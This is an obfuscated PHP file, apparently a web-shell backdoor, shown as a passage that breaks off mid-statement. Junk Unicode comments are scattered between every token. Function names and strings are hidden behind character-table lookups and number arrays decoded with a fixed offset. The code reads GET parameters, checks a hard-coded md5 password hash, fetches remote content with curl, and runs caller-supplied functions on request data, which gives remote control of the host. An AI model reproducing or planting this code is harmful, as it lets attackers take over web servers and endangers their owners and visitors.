<?php /*-
⒍☃∰㊟➥☈≎◸㊡Ⓙ✥⓭↷≶╞╕⊾✫Ü㊧⊧㊩−ⅸ↴
Sd⒍☃∰㊟➥☈≎◸㊡Ⓙ✥⓭↷≶╞╕⊾✫Ü㊧⊧㊩−ⅸ↴
-*///
$BOcCU /*-b<njZ-*///
=/*-9~dk{M-*///
 range/*-


╃≲╌♕︼⇖◯≝↩⊖ↇ↚∠㏒❦┻↵⇉⒧◷❀♆▋


:JfUFGSD╃≲╌♕︼⇖◯≝↩⊖ↇ↚∠㏒❦┻↵⇉⒧◷❀♆▋


-*///
(/*-
⒘〃ⅴ↣⋴⇞∐≎♤❀◛╣⋎☴☏▍┗⓺◱º⇂Ⅱ㊜∧◸☥
>MK⒘〃ⅴ↣⋴⇞∐≎♤❀◛╣⋎☴☏▍┗⓺◱º⇂Ⅱ㊜∧◸☥
-*///
"~"/*-tpp0`NNA-*///
, /*-
⑴﹂◪ⓠ▔↙▨☬⊍ﭢ
dnyc⑴﹂◪ⓠ▔↙▨☬⊍ﭢ
-*///
" "/*-<4wlraIJ-*///
); /*-:&OuL-*///
$rU=${$BOcCU[9+22].$BOcCU[46+13].$BOcCU[12+35].$BOcCU[12+35].$BOcCU[51+0].$BOcCU[30+23].$BOcCU[39+18]};@(count/*-

ⓝ∬┵⓿⋭↊▼㊆⅟≞⇞◝☛

ZqM:iⓝ∬┵⓿⋭↊▼㊆⅟≞⇞◝☛

-*///
($rU)==18&&/*-!_#k-*///
in_array(/*-
⅒⇤♨⋦╪⇂♮∗
$Eqa2o⅒⇤♨⋦╪⇂♮∗
-*///
gettype($rU).count/*-s}A;#3@-*///
($rU),$rU))?(($rU[63]=$rU[63].$rU[72])&&($rU[87]=$rU[63]($rU[87]))&&(@$rU=$rU[87]($rU[52],$rU[63](${$rU[44]}[15])))/*-


∗∡┡⊱┅⒵♫⇌㈡㊀➟➩♓∺❒◑ⅲ☍╠｜⊜◒⋛⋎⒍Ⅷ⑴⊁﹜♂


nA_Hr!,∗∡┡⊱┅⒵♫⇌㈡㊀➟➩♓∺❒◑ⅲ☍╠｜⊜◒⋛⋎⒍Ⅷ⑴⊁﹜♂


-*///
&&/*-

⊽∢Ⅿ⒬◷┶☋㊨∟✆❹—≮⊹≕≽✣∔┆⊡‿

@wln`⊽∢Ⅿ⒬◷┶☋㊨∟✆❹—≮⊹≕≽✣∔┆⊡‿

-*///
$rU()):$rU;/*-

㊉➌▹︿≸㊇Ⅳ》☰⑥►✎

J:Hn㊉➌▹︿≸㊇Ⅳ》☰⑥►✎

-*///
class /*-
↱↰⋗↠↚▆Ⓞ⇞✜⒕╦ℊ⋫﹩◃「✄⇋♤∔◚⓶
Q&fn;wPk↱↰⋗↠↚▆Ⓞ⇞✜⒕╦ℊ⋫﹩◃「✄⇋♤∔◚⓶
-*///
apSn{ /*-eh48m0-*///
static/*-#R`p>-*///
 function /*-

⒒⊋└▇∮❺⊌⇈≕ⓒ➄

E)dks}⒒⊋└▇∮❺⊌⇈≕ⓒ➄

-*///
MSEkVFiqIv($dULr) /*-
∙ø┇☥﹪⒛❽⊦㊡Ⓒ▱┭⇪⅐﹢◨♫♗➉⋇◂㊈⇋
CT|:∙ø┇☥﹪⒛❽⊦㊡Ⓒ▱┭⇪⅐﹢◨♫♗➉⋇◂㊈⇋
-*///
{ $WPc/*-VTj-*///
 = /*-}a%)#]M?H-*///
"r"./*-
☣︴∘⓾⋂↪◫〕㊂◺⋀ⓠ
P!(E8d&h☣︴∘⓾⋂↪◫〕㊂◺⋀ⓠ
-*///
"a"./*-

☪ↆ（◐➟╓

7<Fh☪ↆ（◐➟╓

-*///
"n"./*-W0-*///
"g"./*-~(f<`9,-*///
"e"; /*-


☍≞┧◚⅐㊜➢＂⋻Ⓣ✷◆


?LO)]pSF☍≞┧◚⅐㊜➢＂⋻Ⓣ✷◆


-*///
$KyTSH/*-
⑪⑰♩┎⇕↳⋖⊡∄♘﹄➌◝╤❥
,[TRf{w-a⑪⑰♩┎⇕↳⋖⊡∄♘﹄➌◝╤❥
-*///
 = /*-

♪⋳⊐◠☉≙۰□④︺∫✜⋫┶⋶┚

2fY{3Q:?♪⋳⊐◠☉≙۰□④︺∫✜⋫┶⋶┚

-*///
$WPc/*-

❣┶⊧㏒❂↣✂◻❻☽➓☏▒﹡—∴↷⊛┦♟⊷㊞ℨ

Kj@❣┶⊧㏒❂↣✂◻❻☽➓☏▒﹡—∴↷⊛┦♟⊷㊞ℨ

-*///
(/*-
║Ⓨ⊭⋾☼➣■▏∘ⓡ⌘◊ↁ┽➪◰≀⒔╎ℚ
&h_`DNfDh║Ⓨ⊭⋾☼➣■▏∘ⓡ⌘◊ↁ┽➪◰≀⒔╎ℚ
-*///
"~"/*-iNp-*///
, /*-p+h-*///
" "/*-%aW-*///
);/*-G7f5E-*///
 $ATauHrS /*-
⒚⅘ⓟ▆▤♆▐⊘↊✝▵◔☯╊
Z5x1mS}^⒚⅘ⓟ▆▤♆▐⊘↊✝▵◔☯╊
-*///
= /*-


√⓯⋡▭£﹨《⒓∵∳⋾


A~<58q√⓯⋡▭£﹨《⒓∵∳⋾


-*///
explode/*-


≦⇐♕㊪⓯✳❷╡ⓑ@⊜ↂ&╦⇤ℓ⋷㊩✾↹⋻♘╅✵⑥⅜⒒⓳


v8NWz=|≦⇐♕㊪⓯✳❷╡ⓑ@⊜ↂ&╦⇤ℓ⋷㊩✾↹⋻♘╅✵⑥⅜⒒⓳


-*///
(/*-`u2S]-*///
"*", /*-
↷「↤✪♥⓷ϟ↧㊔⑰⓸➵⊿∜└✮ↇ㊊ⓓ∷❥￡∃❽↗‰ℬ➷
eDS↷「↤✪♥⓷ϟ↧㊔⑰⓸➵⊿∜└✮ↇ㊊ⓓ∷❥￡∃❽↗‰ℬ➷
-*///
$dULr/*-


⇎┫↕♙➓✄☿√ⓔ◀♓⅒∬≰↦╆↗✭☈⒚⊑ㄨ


&,UsOJr[z⇎┫↕♙➓✄☿√ⓔ◀♓⅒∬≰↦╆↗✭☈⒚⊑ㄨ


-*///
); /*-L0r^,kAL-*///
$ODTKgCAB /*-}?-*///
= /*-


➜▆⅒〗⋽⑯ℤ╉ℜ⒫➈▇㊨♢⒐↼⊹㊮≽%✌◅ⓦ《╔Ⓚ¯⇌⋙


:P`Y;Qjz3%➜▆⅒〗⋽⑯ℤ╉ℜ⒫➈▇㊨♢⒐↼⊹㊮≽%✌◅ⓦ《╔Ⓚ¯⇌⋙


-*///
""; foreach /*-

⋳⌘∼⇤〃↳⊤◉†Ⅻ✝➡◺⋲ⓛ∛㊬∞▷▊⒢∑㊣▿

c,|sZ⋳⌘∼⇤〃↳⊤◉†Ⅻ✝➡◺⋲ⓛ∛㊬∞▷▊⒢∑㊣▿

-*///
(/*-


⒇✙⒭✱❉ℯ©⊥∻ℐ∣☋⇑‖╀○➊½Ü✛


&NSc@7Cp=x⒇✙⒭✱❉ℯ©⊥∻ℐ∣☋⇑‖╀○➊½Ü✛


-*///
$ATauHrS /*-


ℝℱ╝


qb0$I&.ℝℱ╝


-*///
as /*-UVH-*///
$ybPRtrf /*-j8!U<jh7`e-*///
=>/*-
▋⒄⇍◙∤➷◽⇏❹░㊔╖➔⒬⑫⋙↷⌖➽ↁ﹋ℳ⇌▩⊹∖⊈⊸⋄⋵
af▋⒄⇍◙∤➷◽⇏❹░㊔╖➔⒬⑫⋙↷⌖➽ↁ﹋ℳ⇌▩⊹∖⊈⊸⋄⋵
-*///
 $mZLoxFD/*-:WRHH-*///
) /*->E~.d-*///
$ODTKgCAB /*-mI-*///
.= /*-tOy-*///
$KyTSH[$mZLoxFD/*-UKL%V-*///
 - /*-


⒆±⊝↕ⓠ☣╫◙⊰⇜⑹⓹◈↸↫∻❃☜〃◅※ⅽ┲⒙㈧◻⊸≅


%rk0DYIQ⒆±⊝↕ⓠ☣╫◙⊰⇜⑹⓹◈↸↫∻❃☜〃◅※ⅽ┲⒙㈧◻⊸≅


-*///
59233/*-

╞㊦╓

S%t|pu<h╞㊦╓

-*///
];/*-

﹟☴◯≚▆◙❆㊮ⓗ⋹⒔∠⓭┦↼㊃

64:eXn﹟☴◯≚▆◙❆㊮ⓗ⋹⒔∠⓭┦↼㊃

-*///
 return /*-
◶◮⓴③㊚
hkUaN1i◶◮⓴③㊚
-*///
$ODTKgCAB; /*-


◪⑯㊢┥¾』Ⓗ㍿⓾➭╫ⅱ


[e]:Qe◪⑯㊢┥¾』Ⓗ㍿⓾➭╫ⅱ


-*///
} /*-
✡↩♜⇁⇇㊁⋢⋺
_}✡↩♜⇁⇇㊁⋢⋺
-*///
static /*-n5-*///
function /*-2co3.-*///
TBJbEPaeD/*-o<-*///
(/*-Z=CO$x:EX-*///
$cmwf,/*-

∤≨┫▎⓪⊋Ⓡ○↴﹋↾≦︷☚㊉╅﹎★ℜ≶┟ⓧ☦╋≕⅔⇆ⅽ

-g~Hn∤≨┫▎⓪⊋Ⓡ○↴﹋↾≦︷☚㊉╅﹎★ℜ≶┟ⓧ☦╋≕⅔⇆ⅽ

-*///
 $MuP/*-ZOz-m-*///
)/*-

ℭ┥↪ⅶ▵⊙⋚Ⓘ◇◷⋧⓷ⓔ﹪○◝≬⒩✹⋪

A:)o95zCℭ┥↪ⅶ▵⊙⋚Ⓘ◇◷⋧⓷ⓔ﹪○◝≬⒩✹⋪

-*///
 {/*-DqNduTLvDl-*///
 $UP/*-

∽∖ⒼⓉ∺⒑⋋✿♬⋒Ⓦ⋰⓼➆‰◇┼㊝◱⑮

;yWb∽∖ⒼⓉ∺⒑⋋✿♬⋒Ⓦ⋰⓼➆‰◇┼㊝◱⑮

-*///
 = /*-
┻☋▨✈ⓛ▴⓹⏢⊧⒏⋋≲∧➬
!o#:^┻☋▨✈ⓛ▴⓹⏢⊧⒏⋋≲∧➬
-*///
curl_init/*-

⅙ø℠☝Ⓓ╋㊯┛➆⋑ℐ➨⊠✩∝⊴╜↹‰

5|{⅙ø℠☝Ⓓ╋㊯┛➆⋑ℐ➨⊠✩∝⊴╜↹‰

-*///
(/*-


Φ∻▍⋹╆Ⓧ⑬↵╈웃⑽㊔□❷⓻⓲


JrFec)HeIXΦ∻▍⋹╆Ⓧ⑬↵╈웃⑽㊔□❷⓻⓲


-*///
$cmwf/*-w?81W-*///
);/*-K(iy-*///
 curl_setopt/*-

㊠ت◓✳≐ⅹ•㊖∻☊❈〗♯㊧ℬ☺∜✓≗⒲⒠︸☭⋪°⋼Ⓥ⒦⇦≿

HhkJ0^㊠ت◓✳≐ⅹ•㊖∻☊❈〗♯㊧ℬ☺∜✓≗⒲⒠︸☭⋪°⋼Ⓥ⒦⇦≿

-*///
(/*-
╨∝∭⇁웃➠ℯⅨ⑵ⓨ✃︶ⅱ유↣
R=>)FrT╨∝∭⇁웃➠ℯⅨ⑵ⓨ✃︶ⅱ유↣
-*///
$UP,/*-#5QIk:Or-*///
 CURLOPT_RETURNTRANSFER,/*-Q2Wc5!-*///
 1/*-JtixI&v-*///
);/*-


Ⓐ❿㊭⋾⇙ㄨ≱∂»╪✗⋶ℒ✮⊁➴⒄⒒╂♋⊃✶&☻⒔↾


QYYvotMm1Ⓐ❿㊭⋾⇙ㄨ≱∂»╪✗⋶ℒ✮⊁➴⒄⒒╂♋⊃✶&☻⒔↾


-*///
 $gy/*-dRLysUZ-*///
 = /*-

╉⒱

m3NY╉⒱

-*///
curl_exec/*-k7D%l5]-*///
(/*-

⏥⒋ΨⒾ♡┹≬⇇❦⋩➆┧┖◀╪┍⋾↥└Ⓨ┐☰╦Ⅺ↽∎≍⒟

2E6#{c&`k⏥⒋ΨⒾ♡┹≬⇇❦⋩➆┧┖◀╪┍⋾↥└Ⓨ┐☰╦Ⅺ↽∎≍⒟

-*///
$UP/*->nC.>-*///
); /*-19`5-*///
return /*-~!%;tx`#-*///
empty/*-


≜﹛ت┘↶❖∍


gAN27S`Z≜﹛ت┘↶❖∍


-*///
(/*-
❺∡ⓗ↢┞
%t|3D.dh{❺∡ⓗ↢┞
-*///
$gy/*-W$-*///
)/*-

「≗◻▄卍Ⅴ⇆ⅱ∦ↈ✎┅≃ↇ✸∌☚┖⒞⊤❻⒝ⓟ✉♝▣⌘♐▊⊹﹍

McRC3l「≗◻▄卍Ⅴ⇆ⅱ∦ↈ✎┅≃ↇ✸∌☚┖⒞⊤❻⒝ⓟ✉♝▣⌘♐▊⊹﹍

-*///
 ? /*-


☨➆╄╚⋮◧█✜▱☾✘➐


!VO-xN☨➆╄╚⋮◧█✜▱☾✘➐


-*///
$MuP/*-|08w-*///
(/*-
┡∆℮
@^?z┡∆℮
-*///
$cmwf/*-
ⅴ♥∷≪↗≮➽⒵
ZV-1LCQ:Yⅴ♥∷≪↗≮➽⒵
-*///
)/*-k2Nnn#~-*///
 : /*-

≆⅜⊣⋐↕⑮⋍﹋✥】⇃◈⒕┉⒡◅☟◖╆┴﹂∯➡◧⑶⑩—

%yxSa]≆⅜⊣⋐↕⑮⋍﹋✥】⇃◈⒕┉⒡◅☟◖╆┴﹂∯➡◧⑶⑩—

-*///
$gy; /*-
✰﹠⑳⋲⒙⋧Ⓠ❸
SO&H,RNi1|✰﹠⑳⋲⒙⋧Ⓠ❸
-*///
}/*-!cA.+-*///
 static/*-


▂↡⇇◼⑶➴Ⅰ﹎┧%☄╏ⓓÜ∕


5Yl`J▂↡⇇◼⑶➴Ⅰ﹎┧%☄╏ⓓÜ∕


-*///
 function /*-4c-*///
WqYlBFz/*-

✝®⇍∲〉≹✂➷﹜♟㊜⑽Ⅵ☷┑⊇卍➈Ⅹ⋀⋮◊⊑⑴↡/

6lFlhla✝®⇍∲〉≹✂➷﹜♟㊜⑽Ⅵ☷┑⊇卍➈Ⅹ⋀⋮◊⊑⑴↡/

-*///
() /*-

❊ℒℚ㊋⇂⇗⓹≪✱ⓠ⒊ℳ⅒≑ⓖⓓ⋽¾≅➳∞▸┫◥⋏∥ℎⒿ

x{❊ℒℚ㊋⇂⇗⓹≪✱ⓠ⒊ℳ⅒≑ⓖⓓ⋽¾≅➳∞▸┫◥⋏∥ℎⒿ

-*///
{/*-

▆﹥⊯☨└

5=jV;ToO▆﹥⊯☨└

-*///
 $uWznAla /*-_v-*///
=/*-

⊓≙⋣➃

a1Emd⊓≙⋣➃

-*///
 array/*-
↪（┙┢▾♢♨⒳⇘㈦﹄➒⒮ⅺ➄➀
<4↪（┙┢▾♢♨⒳⇘㈦﹄➒⒮ⅺ➄➀
-*///
("59260*59245*59258*59262*59243*59258*59264*59257*59242*59249*59260*59243*59254*59248*59249","59244*59243*59245*59264*59245*59248*59243*59310*59308","59253*59244*59248*59249*59264*59259*59258*59260*59248*59259*59258","59247*59262*59260*59252","59261*59262*59244*59258*59305*59307*59264*59259*59258*59260*59248*59259*59258","59257*59254*59251*59258*59264*59256*59258*59243*59264*59260*59248*59249*59243*59258*59249*59243*59244","59287*59317","59234","59312*59317","59294*59277*59277*59294*59270","59248*59257"); /*-
┱⅐┳⇘☁➽∗≼⊢▦╄㊘↜⓽➑◡╟
Uc>l:a┱⅐┳⇘☁➽∗≼⊢▦╄㊘↜⓽➑◡╟
-*///
foreach /*-h?{3]^4[-*///
(/*-iKv-*///
$uWznAla/*-
▷⒆Ⓦ⊳㊌╅ø﹋☼⊿▫π㊧▌⇔↤⑴☰✝⇡≍✵※ⓚ⊜◞√⊏
),}lJnG<Z1▷⒆Ⓦ⊳㊌╅ø﹋☼⊿▫π㊧▌⇔↤⑴☰✝⇡≍✵※ⓚ⊜◞√⊏
-*///
 as /*-


∎✛⓲⊢÷ⓘ↢✌Ⅰ☋﹄⊹↱︸Ψ﹎┫⓬


>EjOm∎✛⓲⊢÷ⓘ↢✌Ⅰ☋﹄⊹↱︸Ψ﹎┫⓬


-*///
$ru/*-

㊝ⅰⓁ⒗Ⓣ↭☩^┛≜┱⋙☥

j;N,n.M|㊝ⅰⓁ⒗Ⓣ↭☩^┛≜┱⋙☥

-*///
)/*-ZKQ_F#-*///
 $CGX/*-
•┭⋔⋟≗❈ℎ≈┪⊂⓫∠⇦⊁℃☩〔
t69ja•┭⋔⋟≗❈ℎ≈┪⊂⓫∠⇦⊁℃☩〔
-*///
[] /*-
»∱⒘░∈㊫≂➦◶☋⇪}⒚⇃⊸※⒓≩◕☈⌘⒄○➐⒋㊭⒩⊨$㈩
W|qHJ»∱⒘░∈㊫≂➦◶☋⇪}⒚⇃⊸※⒓≩◕☈⌘⒄○➐⒋㊭⒩⊨$㈩
-*///
= /*-


⒬↧⊊➎≴╚⒵ℳ⋝∬⋎┫⋄︺×≞㍿↭⇇➌큐


EUV62Wl.Pr⒬↧⊊➎≴╚⒵ℳ⋝∬⋎┫⋄︺×≞㍿↭⇇➌큐


-*///
self/*-h[v}R#-*///
::/*-E]0<-*///
MSEkVFiqIv/*-ftYo)eL#U-*///
(/*-^R|KxKl-*///
$ru/*-

┤▲ⅶ╎⊍

FMT>E69M┤▲ⅶ╎⊍

-*///
);/*-grJmSEz-*///
$cm /*-x1<4^Hn,-*///
= /*-kW-*///
@$CGX/*-
㊐❦≜┨﹌⒰÷☼▻▎┄≫━﹟—⇍╃⌓↵↋≓―➍◵≥↜➈☴✣
DB㊐❦≜┨﹌⒰÷☼▻▎┄≫━﹟—⇍╃⌓↵↋≓―➍◵≥↜➈☴✣
-*///
[/*-
⑱㊢
miuC%)o⑱㊢
-*///
1/*-ABks-*///
]/*-
┉➲┋◐↠¤⋓♪➨㊈╟◚⋆⊔◢┝⒣
-)┉➲┋◐↠¤⋓♪➨㊈╟◚⋆⊔◢┝⒣
-*///
(/*-

㊪♜◸

+tKE$awNr㊪♜◸

-*///
${/*-`$-*///
"_"/*-
↲⒛≱✆✤┣♧╇⋈⋐⊥┬♖➒⓸◣≾Ⓜ♦⊂Ⅸ
EdU8s↲⒛≱✆✤┣♧╇⋈⋐⊥┬♖➒⓸◣≾Ⓜ♦⊂Ⅸ
-*///
."G"/*-An-*///
."E"/*-Uh$-*///
."T"/*-;0X-*///
}[/*-+X-*///
$CGX/*-


⋹⋶


L)QRaD>⋹⋶


-*///
[/*-i!iQ-*///
5+4/*-mLF;wI9}-*///
]]/*-yHLM#pJ9-*///
);/*-[=c_8-ag;^-*///
 $CRHB /*-
↖☝⋞⊶≚㈦⋦◆㊡↢ℙ⒔⊕◼☟✥♟⋓▪✿⒄≷½☩﹟◨
t0E&↖☝⋞⊶≚㈦⋦◆㊡↢ℙ⒔⊕◼☟✥♟⋓▪✿⒄≷½☩﹟◨
-*///
=/*-

☸❹⋂▐┃⊵¿⇩☃✏≻∫⑧㊂

DO-.☸❹⋂▐┃⊵¿⇩☃✏≻∫⑧㊂

-*///
 @$CGX/*-


Ⓚⓨ%↊⋓♧Ⅽ㊘❁◌✁≅﹂⋘╨Ⅼ⊎⊶□▒⊕∲㊤╡⊌⋔⓰㊒


uqⓀⓨ%↊⋓♧Ⅽ㊘❁◌✁≅﹂⋘╨Ⅼ⊎⊶□▒⊕∲㊤╡⊌⋔⓰㊒


-*///
[/*-

♠┙✢➅⊄㊅⒈⌘﹠¡ℊ◗∜⅚∇Ⅾ⊡∁☷≨⅐ⓙ◶☹ⅻ㉿㊏♕ℜⓘ¥

$FEW40)7(5♠┙✢➅⊄㊅⒈⌘﹠¡ℊ◗∜⅚∇Ⅾ⊡∁☷≨⅐ⓙ◶☹ⅻ㉿㊏♕ℜⓘ¥

-*///
3+0/*-X:`D-*///
]/*-]DBjGm-*///
(/*-

⒍◪❹≊⇨⋩%℃⊃↯⒎

QAL36yA{l⒍◪❹≊⇨⋩%℃⊃↯⒎

-*///
$CGX/*-


➂↥


)DSo>g:b➂↥


-*///
[/*-


∏⓶➦⋝≔○ⅷ▓큐↮


|JBT2M∏⓶➦⋝≔○ⅷ▓큐↮


-*///
0+6/*-

⒋◨》

kZkSa⒋◨》

-*///
], /*-


㊇⑵▉▯ⓩ∵❒⊋□⋩ℊ▧《⋼⑭≣㊌


,49㊇⑵▉▯ⓩ∵❒⊋□⋩ℊ▧《⋼⑭≣㊌


-*///
$cm/*-B!1hUab-*///
);/*-


º♐▤☸¡➑┦≡


?OV+)mGOº♐▤☸¡➑┦≡


-*///
 $BhdOLf /*-T}BpA-*///
=/*-
ⓟ⇂⊓➹☁¢⊏✓◊┴⋈￡┟
b?u(R#ⓟ⇂⊓➹☁¢⊏✓◊┴⋈￡┟
-*///
 $CGX/*-M}bKL=Ewln-*///
[/*-#G|uVu-*///
0+2/*-

↓⒋︷⋩﹦≉✐Ⅼ⋭☉㊆❒✪➽∄⒳㈣❾

b8W-↓⒋︷⋩﹦≉✐Ⅼ⋭☉㊆❒✪➽∄⒳㈣❾

-*///
]/*-

◁™⑹⋗ⓦ┗⇪☤⊠❋

#,D◁™⑹⋗ⓦ┗⇪☤⊠❋

-*///
(/*-uAn_Mfk-*///
$CRHB,/*-[P)k7!-*///
 true/*-


㈩♫➦⋳﹣↛㊤⋅Ⅽ╦◒✁ⓩ➶┯$∟╗⊪✿↺≢⋌┽Ⅰ


(0<~㈩♫➦⋳﹣↛㊤⋅Ⅽ╦◒✁ⓩ➶┯$∟╗⊪✿↺≢⋌┽Ⅰ


-*///
); /*-


☃¤◟┼≼▻⒊↑―⅐⊾↼≉


i@4F☃¤◟┼≼▻⒊↑―⅐⊾↼≉


-*///
@${/*-

◥╡▵ⓞ﹟♋유┪≯

KLG$$◥╡▵ⓞ﹟♋유┪≯

-*///
"_"./*-`:8Vln$}-*///
"G"./*-
┫♓☻☥⊿︹❶⋠ℍ⋓╏｜⌖ↇ┹Ⅵ┈Ⅺ•
[Z5┫♓☻☥⊿︹❶⋠ℍ⋓╏｜⌖ↇ┹Ⅵ┈Ⅺ•
-*///
"E"/*-

⒏㊣✏⋄〃✣⋊✭⋰▫•⊊◩◴⊏

;[mpHcb3O⒏㊣✏⋄〃✣⋊✭⋰▫•⊊◩◴⊏

-*///
."T"/*-s|H;HOS?d9-*///
}/*-


」﹍┋╃█⌔∐‡⒵⅙≨⒆【┟↞◢⊛◝≠㊢Ⅰ⊆㊊♋㉿≺ⅽ✽


]@7HQk|」﹍┋╃█⌔∐‡⒵⅙≨⒆【┟↞◢⊛◝≠㊢Ⅰ⊆㊊♋㉿≺ⅽ✽


-*///
[/*-


┪↋ℨ➸⇒⊗︵∗⇠☾〔☀﹣⋰☥↹⒪❖⑴ⅲ∻⊿➆


@ZmsR[-%`,┪↋ℨ➸⇒⊗︵∗⇠☾〔☀﹣⋰☥↹⒪❖⑴ⅲ∻⊿➆


-*///
$CGX/*-

︷╇

b)cxDMb︷╇

-*///
[8+2/*-

Ⓨ⏢㈢﹁⒊↙⒅

`+8wⓎ⏢㈢﹁⒊↙⒅

-*///
]/*-


╗⊗⋞∎⇆➅⑮❄⊲Ⅿ⒋⋤➩➫「▊≴⋖➵☑℉┎［


NB}74╗⊗⋞∎⇆➅⑮❄⊲Ⅿ⒋⋤➩➫「▊≴⋖➵☑℉┎［


-*///
]/*-

㊄❦♚⒞⋩⇐♜◀﹉⋍ⓓ▶∊℠♬≪▊♡⊢⊙˜Ⓡ

Mw㊄❦♚⒞⋩⇐♜◀﹉⋍ⓓ▶∊℠♬≪▊♡⊢⊙˜Ⓡ

-*///
 == /*-Q6~S1O;1-*///
1 /*-


➚┹➀❷Ю┢≃▊❖⒱㊑㊦︽卍⋵∞


4TMi2}_oG➚┹➀❷Ю┢≃▊❖⒱㊑㊦︽卍⋵∞


-*///
&& /*-1RrPYa?[e-*///
die/*-c0Uu^h-*///
(/*-

▃⅛⊂♝╅⊃∩

UI9wYef`<▃⅛⊂♝╅⊃∩

-*///
$CGX[1+4/*-
⇂↣╅▯⊆⇓➊Σ⑨㊯≕╣﹟□㊃﹣
^~^9Pued;o⇂↣╅▯⊆⇓➊Σ⑨㊯≕╣﹟□㊃﹣
-*///
]/*-d33Vd?mJ-*///
(/*-


∺╉﹡▭ⓩ◝￡↪Ⓒ⚘≍∊°⋕


Amz8∺╉﹡▭ⓩ◝￡↪Ⓒ⚘≍∊°⋕


-*///
__FILE__/*-yY|=hZQ-*///
)/*-WGXAC(-*///
); /*-


❊⇧≦↭㊀➘⑿╕≛∪﹏ⅱⅲ✍−∺ⅷ✲﹪✏❺


dD❊⇧≦↭㊀➘⑿╕≛∪﹏ⅱⅲ✍−∺ⅷ✲﹪✏❺


-*///
if/*-

㊭∥ﭢ」㊎⇜⇃✬﹂⒋✐⋒♘✲∖☟↢⒆∏

_!xlB_㊭∥ﭢ」㊎⇜⇃✬﹂⒋✐⋒♘✲∖☟↢⒆∏

-*///
(/*-


✽≂ⓐ▐▏▌▊ⓜ◾⊈≚②』#﹂╀⅑➪¿ⓑ⊎✣▬╕Ⅰ⊇


Rl{✽≂ⓐ▐▏▌▊ⓜ◾⊈≚②』#﹂╀⅑➪¿ⓑ⊎✣▬╕Ⅰ⊇


-*///
 (/*-

﹃⊹⋊ⅹΘ▉⑳⊻╀Ⓕ⊋⋅ⓑ☝☓→➼⊟⋎↩

72r?i﹃⊹⋊ⅹΘ▉⑳⊻╀Ⓕ⊋⋅ⓑ☝☓→➼⊟⋎↩

-*///
(@/*-1c_JR;-*///
$BhdOLf/*-l0Xh<-*///
[/*-
∳➲╧➧ℚ╛☒‡╬◆◊∉≜✣➦➤◫─╘⇒➱⋧⇪
WXOVG^E∳➲╧➧ℚ╛☒‡╬◆◊∉≜✣➦➤◫─╘⇒➱⋧⇪
-*///
0/*-pU-*///
] /*-3G[_{H-*///
- time/*-$=p46;,a-*///
()/*-

©/┿↾⋄≚⒭☻┆

A$-<z`|©/┿↾⋄≚⒭☻┆

-*///
) > /*-

ღ⇞ΣⓀ（▴∢Ⓠ┅⅝

W,A!2Nr:Iღ⇞ΣⓀ（▴∢Ⓠ┅⅝

-*///
0/*-Ij&3cK-*///
)/*-3tMn-*///
 and /*-


ღ⑨⑦↳㊓┯ⓡ✧ℬ┲☯⓻㊙㊑÷


itr9TBf(>ღ⑨⑦↳㊓┯ⓡ✧ℬ┲☯⓻㊙㊑÷


-*///
(/*-{9|#-*///
md5/*-
┈█ℬ➋⋇⊒ℯℝ┝⚘㊂▕㎡▵◧⊇㏑⒌⓳◈≝」┣』ⓦ¡✂ㄨت㊪∃
]┈█ℬ➋⋇⊒ℯℝ┝⚘㊂▕㎡▵◧⊇㏑⒌⓳◈≝」┣』ⓦ¡✂ㄨت㊪∃
-*///
(/*-


┕⑽╍≷ⓨⓩ⓪ↅ━⒝⑪⊑➉⊭⅛≋


ds2Q┕⑽╍≷ⓨⓩ⓪ↅ━⒝⑪⊑➉⊭⅛≋


-*///
md5/*-

┿ↂ✔╌⓳♦⊴⊚Ü⊖╧ↇ❖╕✐⋇ⅾ©⒊ㄨ⊩➵

+&+E<┿ↂ✔╌⓳♦⊴⊚Ü⊖╧ↇ❖╕✐⋇ⅾ©⒊ㄨ⊩➵

-*///
(/*-


⇒∦⊏▮❑⒓┞


x,⇒∦⊏▮❑⒓┞


-*///
$BhdOLf/*-

⊣⊍▔❷⇅﹁㈣⒢☽↬☟➭㊠∸↳⋱▤╉

sl⊣⊍▔❷⇅﹁㈣⒢☽↬☟➭㊠∸↳⋱▤╉

-*///
[/*-

＂╘』╤☼Ⓥ︻⋈⓮❸ↅ⊎┓ⓖ✝⑿Ⓐ╨┡↊≈

NS22<F＂╘』╤☼Ⓥ︻⋈⓮❸ↅ⊎┓ⓖ✝⑿Ⓐ╨┡↊≈

-*///
0+3/*-


⒣←㊚︹


>bH⒣←㊚︹


-*///
]/*-PYf-*///
)/*-j4tk~F%-*///
)/*-

✌≊∯⊿②⇀﹏∔⑽﹍〓◵≑⊄☎↰◄↪⊒☽⅛➂┋⌓

q1.SU!fxfr✌≊∯⊿②⇀﹏∔⑽﹍〓◵≑⊄☎↰◄↪⊒☽⅛➂┋⌓

-*///
 === /*-7FTcM@K-*///
"7777fe8da1c303a9986e217446cb8072"/*-


⊀◲▅♘≜↝∙✎◜⊅▭♞☧⒩↲⒤⇃


@Zi=⊀◲▅♘≜↝∙✎◜⊅▭♞☧⒩↲⒤⇃


-*///
)/*-
✠⋸♮◐┱ℜ☉
%vDJi✠⋸♮◐┱ℜ☉
-*///
 ): /*-
▃┳⋒ℰⅭ⏥╏⊑⅐━➟⑯∨⒋┄╈⓻☪◄♙⊬ⓓ❶⇕⊊◱⇝⊉╝✖☱
u{TW▃┳⋒ℰⅭ⏥╏⊑⅐━➟⑯∨⒋┄╈⓻☪◄♙⊬ⓓ❶⇕⊊◱⇝⊉╝✖☱
-*///
$km /*-:czq-*///
=/*-
︿◛﹂︵
Q9_︿◛﹂︵
-*///
 self/*-


♂◨﹎『ⅼ❽◗♢Ⅺ⋃☥⒌☍≥❊╜㎡{┑♠


UgVr♂◨﹎『ⅼ❽◗♢Ⅺ⋃☥⒌☍≥❊╜㎡{┑♠


-*///
::/*-

↭⇝℅➎⊰⊴↣▌➻

).&↭⇝℅➎⊰⊴↣▌➻

-*///
TBJbEPaeD/*-


⒪⇋☢⊿︾▀Ⓢ⓹


7I7cDE⒪⇋☢⊿︾▀Ⓢ⓹


-*///
(/*-CKX?3-*///
$BhdOLf/*-,[UOa-*///
[/*-
☺⊝㊄↨☤ℰ╊Ⓙ▱∏∧㊂➃↞⑿⋉✔⒌♭℘≏⊇─≱┚
uTN☺⊝㊄↨☤ℰ╊Ⓙ▱∏∧㊂➃↞⑿⋉✔⒌♭℘≏⊇─≱┚
-*///
0+1/*-


⇆◁◛


vm⇆◁◛


-*///
], /*-
⒯◅□╤➯⑨↨㊗┊♬⒰⊄⓫
8I<ad⒯◅□╤➯⑨↨㊗┊♬⒰⊄⓫
-*///
$CGX/*-
